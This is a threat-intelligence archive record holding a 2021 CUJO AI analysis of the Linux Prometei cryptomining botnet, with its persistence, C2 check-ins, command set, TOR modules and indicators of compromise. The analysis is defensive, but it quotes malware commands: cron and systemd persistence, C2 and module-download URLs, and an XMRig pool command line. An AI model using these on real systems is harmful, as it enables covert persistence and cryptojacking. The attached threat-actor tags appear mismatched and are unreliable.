{
	"id": "fe9908cb-070c-420a-8609-0ce4d678171c",
	"created_at": "2026-04-06T00:16:18.288792Z",
	"updated_at": "2026-04-10T03:24:29.247654Z",
	"deleted_at": null,
	"sha1_hash": "d3128ce8f1d05643a302db849c620196cba0b89e",
	"title": "IoT Malware Journals: Prometei (Linux) - CUJO AI",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 93384,
	"plain_text": "IoT Malware Journals: Prometei (Linux) - CUJO AI\r\nBy Albert Zsigovits\r\nPublished: 2021-03-10 · Archived: 2026-04-05 18:20:03 UTC\r\nThe IoT Malware Journals series will cover the IoT threat landscape from a technical perspective. For this first\r\narticle in the series, I will analyze the Linux version of the Prometei malware, which first made headlines in\r\nDecember 2020.\r\nWe often find IoT malware that is simply built on the leaked source code of Mirai or Gafgyt. It’s not so typical to\r\nfind new variants that are unique: either wholly written from scratch or ported from other platforms, such as\r\nWindows.\r\nOriginally, Prometei had been a modular Windows botnet that mined the Monero cryptocurrency. In early\r\nDecember, it was discovered targeting Linux environments for the first time. It’s possible that the original\r\ndeveloper(s) were unhappy with the spread of their malware and wanted to take advantage of other platforms.\r\nAnother theory is that this new Linux variant is the work of a completely different group.\r\nPrometei’s C2 IP and URLs are blocked by the Safe Browsing/IP Reputation feature of CUJO AI\r\nSentry. Learn more by reading the Sentry white paper.\r\nintezer prometei botnet\r\nIntezerLabs announcing the discovery of Prometei on Linux\r\nFile analysis of the Linux Prometei version\r\nPrometei binaries are all stripped of symbols and debug information, making reverse-engineering a bit harder. No\r\npacking was applied to the binaries.\r\nMagic information:\r\nELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-TrID:\r\nELF Executable and Linkable format (Linux) (4029/14) 49.77%\r\nELF Executable and Linkable format (generic) (4004/1) 49.46%\r\nEntropy measures the randomness of a given data set and is used to detect signs of packing, encryption or any sort\r\nof compression. ~5.7 is a good indicator that what we have here is a native executable without any packing, but\r\nwe can also check the plain-text strings to be sure.\r\nEntropy:\r\nhttps://cujo.com/iot-malware-journals-prometei-linux/\r\nPage 1 of 9\n\n5.789075219871666\r\nPrometei execution flow\r\nFirst, Prometei tries to find out if it can install itself on the system and checks whether a copy of Prometei has\r\nbeen installed on the system previously by looking for Prometei-specific artifacts.\r\nstrace prometei\r\nstrace output of the malicious binary\r\nIf the logged in user does not have sufficient rights (root), Prometei installs itself in “Usermode” and leaves a\r\ncrashed.dump file in /home/user, which is the malicious binary itself. It also places a custom, machine-specific\r\nidentification ID under the filename CommId into the /home/user folder.\r\nusermode prometei\r\nPrometei Usermode install\r\nIf the user has root privileges, the malicious code will install itself system-wide (“Systemmode”):\r\nsystemmode prometei\r\nPrometei Systemmode install\r\nThen the malware creates a random bot identifier file in /etc/CommId, which has a 16 byte string inside, made\r\nup of numbers and capital English letters: /etc/CommId.\r\nExample IDs:\r\nMU2G1NCM0HDF3L2N\r\n6214X121I3A61W1S\r\n2S53GTBN3H8XTE5J\r\n91S3UJ2R3244U300\r\nIt uses this identifier during the C2 check-in phase. The Prometei bot identifier is passed along in a GET request\r\nvia the \u0026i= parameter inside the URL. The purpose of this identifier is to keep track of every unique installation\r\non the botnet:\r\nhttp://p1.feefreepool[.]net/cgi-bin/prometei.cgi?r=18\u0026i=MU2G1NCM0HDF3L2N\r\nThe program continues by setting up persistence. It places a service file under\r\n/lib/systemd/system/uplugplay.service with the following content:\r\nprometei persistence\r\nService for persistence\r\nhttps://cujo.com/iot-malware-journals-prometei-linux/\r\nPage 2 of 9\n\nThen, a symlink will be created from /etc/systemd/system/multi-user.target.wants/uplugplay.service to\r\n/lib/systemd/system/uplugplay.service. This ensures the binary will be executed upon a restart.\r\nExecution will continue by setting up a scheduled cron job. It is placed into /tmp/task.cron with a reboot\r\ncommand: @reboot means run the following command once after the system reboots.\r\n@reboot /usr/sbin/uplugplay -cron.\r\nThen task.cron gets installed via crontab:\r\n# DO NOT EDIT THIS FILE - edit the master and reinstall...# (task.cron installed on Wed Jan 13 15:37\r\nAs a final step, the malware masquerades itself by copying the binary into the following folder:\r\n/usr/sbin/uplugplay and deleting itself from the original execution location.\r\nDynamic process tracing:\r\nWhen tracing the execution of Prometei, it executes the following commands:\r\nPersistence Infection markers Gathering information\r\nSystemctl daemon-reload Pgrep promet15 Cat /proc/cpuinfo\r\nSystemctl enable uplugplay.service Pgrep uplugplay Dmidecode –type baseboard\r\nSystemctl start uplugplay.service Pidof uplugplay Cat /etc/os-release\r\nCrontab -l Pgrep upnpsetup Cat /etc/redhat-release\r\nCrontab task.cron Pidof upnpsetup uptime\r\nThe commands in the first column are used to set up persistence. Then Prometei checks whether it has already\r\nbeen installed on the system via the pidof and pgrep commands. Moreover, the commands in the third column are\r\nresponsible for gathering information from the victim host.\r\nPrometei botnet network traffic analysis\r\nLet us quickly investigate the C2 communication. Every Prometei bot installation gets tracked by a simple check-in activity, which holds a custom, random identifier. Note the old HTTP/1.0 protocol version used.\r\nTraffic can be easily intercepted via a local python webserver:\r\npython webserver prometei\r\nIntercepting Prometei botnet traffic via python webserver\r\nc2 prometei botnet\r\nhttps://cujo.com/iot-malware-journals-prometei-linux/\r\nPage 3 of 9\n\nC2 check-in activity\r\nURI parameters:\r\n?r – randomized with each request, integer between 0 and 30, seems to serve no purpose currently\r\n\u0026i – unique victim identifier, 16-byte string\r\nOnce the check-in completes, the controller immediately sends the sysinfo command for execution, and the\r\ncollected system information gets sent right back to the botnet controller:\r\nsysinfo c2 prometei botnet\r\nExfiltrating sysinfo output\r\nURI parameters:\r\n?add – base64 encoded information that is collected from the system\r\n\u0026i – unique victim identifier\r\n\u0026h – hostname\r\n\u0026enckey – base64 encoded encryption key\r\nThe base64 encoded section (?add parameter) translates to:\r\ninfo {\r\nv2.92X_Unix64\r\nubuntu-analyzer\r\n1x Intel(R) Xeon(R) Silver 4210 CPU @ 2.20GHz\r\nIntel Corporation\r\n440BX Desktop Reference Platform\r\nUbuntu \u0026 16.04.4 LTS (Xenial Xerus)\r\n/usr/sbin/\r\n14:31:30 up 6 min, 1 user, load average: 0.89, 0.47, 0.22\r\nLinux ubuntu-analyzer 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x8\r\n}\r\nSandbox dynamic run output from Joe Security LLC. Report at\r\nhttps://www.joesandbox.com/analysis/339103/0/html\r\nCommands\r\nNext, the malware enters a dormant state: listening for instructions from its C2 server. The following list of\r\ncommands was available in the examined binary:\r\nCommands Description\r\nchkport the msdtc module initiates a port scan on the victim host\r\ndebug debug the victim host for any issues\r\nhttps://cujo.com/iot-malware-journals-prometei-linux/\r\nPage 4 of 9\n\nexec executes a binary on the system from a path\r\nextip fetches the external IP address of the victim\r\nquit exits the listener process\r\nquit2 exits the listener function but leaves the process on\r\nset_cc sets a new C2 IP address\r\nstart_mining starts the Monero cryptocurrency miner\r\nstop_mining stops the Monero cryptocurrency miner\r\nsysinfo gathers information from the victim machine for exfiltration\r\ntouch creates a file on the victim system\r\nupdatev4 fetches the latest version of the malware\r\nwget downloads a file from a URL\r\nxwget downloads a file from a URL with a 1-byte XOR operation\r\nPrometei traffic routing through proxies and TOR\r\nPrometei has an additional module in which traffic can be routed through TOR or I2P, rather than the conventional\r\nHTTP route. These modules go under the name:\r\nmsdtc – Proxy client\r\nsmcard – TOR relay\r\nmsdtc proxy prometei botnet\r\nStatus messages of the msdtc proxy client\r\nmsdtc tor proxy prometei botnet\r\nmsdtc showing status information of the TOR service\r\nWhen Prometei first pulls down these modules, it downloads them via the dwn.php resource:\r\nhttp://178.21.164[.]68/lQ.php?a=t-msdtc\r\nhttp://178.21.164[.]68/lQ.php?a=t-smcard\r\nThe malware runs the following commands to check whether the TOR or proxy modules are already running:\r\npgrep smcard\r\npidof smcard\r\nhttps://cujo.com/iot-malware-journals-prometei-linux/\r\nPage 5 of 9\n\n/etc/smcard\r\n/usr/sbin/smcard\r\nThe proxy request gets executed in an interesting way: the .onion address is base64 encoded and is called as a\r\nparameter to the msdtc module:\r\n/usr/sbin/msdtc aHR0cHM6Ly9nYjduaTVyZ2VleGRjbmNqLm9uaW9uL2NnaS1iaW4vcHJvbWV0ZWkuY2dpP3I9MyZpPU1VMkcxT\r\nWhich translates to:\r\n/usr/sbin/msdtc https://gb7ni5rgeexdcncj[.]onion/cgi-bin/prometei.cgi?r=3\u0026i= MU2G1NCM0HDF3L2N\r\nHow Prometei mines cryptocurrency\r\nPrometei can also deploy a cryptocurrency miner in the form of the application XMRig. The process is usually\r\nnamed updatecheckerd.\r\nstart_mining xmrig updatecheckerd prometei botnet\r\nStarting and stopping the mining operation\r\nWhen the start_mining command is received from the C2 server, it will connect to the following miner server:\r\n/usr/sbin/updatecheckerd -o stratum+tcp://5.189.171[.]187:3333 -u 4A1txQ9L8h8NqF4EtGsZDP5vRN3yTVKynbk\r\nConclusion\r\nPrometei is another example of how a malicious binary grows on a Linux environment and spreads through the\r\nsystem with persistence. Some feature of the Windows version of Prometei were not implemented in Linux,\r\nmeaning that this is most likely an early development version of the malware, and we may see advancements in its\r\ncapabilities as time goes on.\r\nThis is most likely an early development version of the malware, and we may see advancements in its\r\ncapabilities as time goes on.\r\nIt is also unclear whether the same group that developed the malware for Windows is behind the Linux version,\r\nand whether the developers are also the ones that distribute this piece of malware. Lately, developer groups have\r\nadopted the MaaS (Malware-as-a-service) business model, where they offer malware to be used by others.\r\nWe may learn more about these aspects of Prometei with future versions of the malware.\r\nSpecial thanks to Talos Intelligence for their previous research on the Windows version of Prometei.\r\nCoverage\r\nhttps://cujo.com/iot-malware-journals-prometei-linux/\r\nPage 6 of 9\n\nThe C2 IP and URLs are blocked by Safe Browsing/IP Reputation feature of CUJO AI Sentry.\r\nIndicators of Compromise:\r\nBinary hashes:\r\nSHA256 ITW name\r\n0302c22471c7da7a4cfd9ef3cb1e35decd8670ee0c00f3f4714b2e918008f4bf –\r\n07cb3e27c8cd53b267ad2f1367735b99d04d3d5b5ecc25d0dedc7856d792eaa2 uplugplay\r\n0eefa989b04824ab190c9582b0068ffbb5bd0abd61dd4933d3abe5cf4a91c6c1 uplugplay\r\n16c6abaa14874194c407174d2ac9f8a6a41386b0aedeea05227233c86f11c84b –\r\n2bc860efee229662a3c55dcf6e50d6142b3eec99c606faa1210f24541cad12f5 –\r\n39052040d4a586f287dddbcc653699ce09c77bb6a336a550b5b349b674bbd46e msdtc2\r\n3ba4dfb78c1eff9fcad3d3229cd78fa976203d01e343f878ec6a4f4b6c2837eb –\r\n417248cd0bf1da8a31c001454d34f3d9a58a7adbc8b5efe287cb0e7d51dd57fc –\r\n45aeade798eee1893d3e7a4d850b882c0d67c6736c287b64edcb8c3ef1d6fb74 –\r\n46cf75d7440c30cbfd101dd396bb18dc3ea0b9fe475eb80c4545868aab5c578c –\r\n5588bbb8604a1aebe8a2e8e7767b7655180d27dfc46025198dcf0cfe3aa3e333 –\r\n6a7781b1fa4c3c4a8f25186d145120c1f814f578ae378a30e0250372f38a0dda –\r\n7e040ebba241e95a93e739826953b8cdedf2035c2dffbf7903b7f04c9c2a1fb7 msdtc2\r\n75ea0d099494b0397697d5245ea6f2b5bf8f22bb3c3e6d6d81e736ac0dac9fbc lQ.php\r\n9b4ae19d6de1023fb9d828badaff720d1f4f44268f6d94aa27cf00347dd93e6e uplugplay\r\na3d53930cfe77cd9cb72e076958d29258b2751d1c5a9f58a735e0fcc6019e993 upnpsetup\r\nf037eedb09226097e7a95e9cbdcf75196efce754316f9bcbabbff7a7d402fa30 msdtc\r\nfb84793c36a8a6b71a6426a0899e567f44206c01f62ab8074204aa37e9307244 uplugplay\r\nfecd75ddb8ef7ebfeea559bb167e69a3200c1f5b868b5e592e1a5e9f539940dd –\r\nffc582b02faff5d69943bf1b189b7d57637a87cadef236751c561ae625e928e9 –\r\nVhash:\r\nhttps://cujo.com/iot-malware-journals-prometei-linux/\r\nPage 7 of 9\n\n48f54ad80089ef4bebfedb8fcb0df0e8\r\n69d9f3c8b912fb3a6f17b9f2d63fea9f\r\nTelfhash:\r\nt127e0f882ae3c8e0c8ea20970dcc80690a003ba12c4236f38df14ead0803b209e01cdaf\r\nt121e07d81ea761c0c8ee25630ec816af0e217e71140260b24d795d9d0e43e54ef01ce7f\r\nt12ae072c1ea360c1c8ae29a3098826af0a217eb1200220a24db99c9d0b03a50ef01cd7b\r\nURLs:\r\nhxxp://p1.feefreepool[.]net/cgi-bin/prometei.cgi\r\nhxxp://dummy[.]zero/cgi-bin/prometei.cgi\r\nhxxps://gb7ni5rgeexdcncj[.]onion/cgi-bin/prometei.cgi\r\nhxxp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32[.]i2p/cgi-bin/prometei.cgi\r\nIPs:\r\n5.189.171[.]187 | DE\r\n88.198.246[.]242 | DE\r\n178.21.164[.]68 | IR\r\nITW names:\r\nmsdtc\r\nmsdtc2\r\nsmcard\r\nsmcard2\r\nupdatecheckerd\r\nuplugplay\r\nupnpsetup\r\nKey:\r\nGtvRsdC7YqIEXKfsICVsKakP-03j9/VleLebEc2bTYGmdiXITbyxwz-PbOtEuMN22r9hwfdHVaojeeMh3gUpa/-FqTFAq/FrwpXyS\r\nhttps://cujo.com/iot-malware-journals-prometei-linux/\r\nPage 8 of 9\n\nConfig parameters:\r\n{\"config\":1,\"id\":\"L8AbF4X6u4pX43A8\",\"enckey\":\"HlVYYUweX6WMTV5P+JATR+baodBdDQJWwMEFEOYBMhu7uK3o+BYTWtS\r\n{\"config\":1,\"id\":\"WEx0Pps3ZUh598C8\",\"enckey\":\"A2jscIU2gIo7Te1Ie/q/l4bVCJ/oziW7F5Uf9p8NSNn+fwEOFGVTjGP\r\n{\"config\":1,\"id\":\"gpla9JLFbRSI60gS\",\"enckey\":\"hYv+Qp9ct9xV70M3s9jU3fWWBOvahJqLs/jm/jgrW1ATpX7ODhGoT4Q\r\n{\"config\":1,\"id\":\"505k870uY272Q5E1\",\"enckey\":\"NCdhTiwuebwkgAYF7/45blF0j+1jMHQEhGuYrRx+DCc8WGj5AqKBbBB\r\n{\"config\":1,\"id\":\"T26eZmbJ2uGqnGfl\",\"enckey\":\"k8unMw2Q4pfu63Ta8sD79cKg1VNk2XmPg2Szrh329orjKfItUdyScIC\r\n{\"config\":1,\"id\":\"n2vI4N477vTFBlUk\",\"enckey\":\"4tzTmtpHMr68+lMXX7RdmFiBzalwdWtmYwDJwd23vGnbahRtckEia8w\r\n{\"config\":1,\"id\":\"P4UsWr3b8Y9jn5oB\",\"enckey\":\"Ymmbggs2BddRqk+mv0orU1hN/miqtV/dO09e+hENvs8urxdwpt+U5RT\r\n{\"config\":1,\"id\":\"K24Teqj1aY4tOJb6\",\"enckey\":\"JKBcjf3v2qPvIWCSM7cbobeSU7djVyAfSz643RrJfSPjgn2WpeAy0LB\r\n{\"config\":1,\"id\":\"88E80c47duQxmQl1\",\"enckey\":\"w790UgOXnL014UAmBMYMNGNSzwS7TsO8aylRy52LIgCBQkQoDVNZFdz\r\n{\"config\":1,\"id\":\"9oS6dQUQGSVQT3Bx\",\"enckey\":\"XYkzd3GAyMkoxadx5tGOgNmbn7nbyicXMNzuxrNYWRRa76nCmWEqPyx\r\n{\"config\":1,\"id\":\"0yUhdo2DH6R4L1DS\",\"enckey\":\"blWV9WpaVO0tLHUuB2Dun1r9EQ0rNitZA1d3SwLopoly4rCyBkoUiOM\r\n{\"config\":1,\"id\":\"29GRN59seMW6R9xq\",\"enckey\":\"F5mGmixSHYDjcbmAJfOmEXB76jhOuJma/mH6rLvvDgqAscm+TJxiD79\r\n{\"config\":1,\"id\":\"mO123CwT2U68awpK\",\"enckey\":\"2Jr3crhwoE/IUN5x3MA7YSahJfWC9l6MmzXGLquwZYIWy6rYlFcuM1D\r\n{\"config\":1,\"id\":\"RJ372033v7RyJCSG\",\"enckey\":\"6nKA769q5CexBQxyhZdE3LD2IPdGufwt2qjv1kLq5w59ZJEGS1DhMya\r\nSource: https://cujo.com/iot-malware-journals-prometei-linux/\r\nhttps://cujo.com/iot-malware-journals-prometei-linux/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cujo.com/iot-malware-journals-prometei-linux/"
	],
	"report_names": [
		"iot-malware-journals-prometei-linux"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434578,
	"ts_updated_at": 1775791469,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d3128ce8f1d05643a302db849c620196cba0b89e.pdf",
		"text": "https://archive.orkl.eu/d3128ce8f1d05643a302db849c620196cba0b89e.txt",
		"img": "https://archive.orkl.eu/d3128ce8f1d05643a302db849c620196cba0b89e.jpg"
	}
}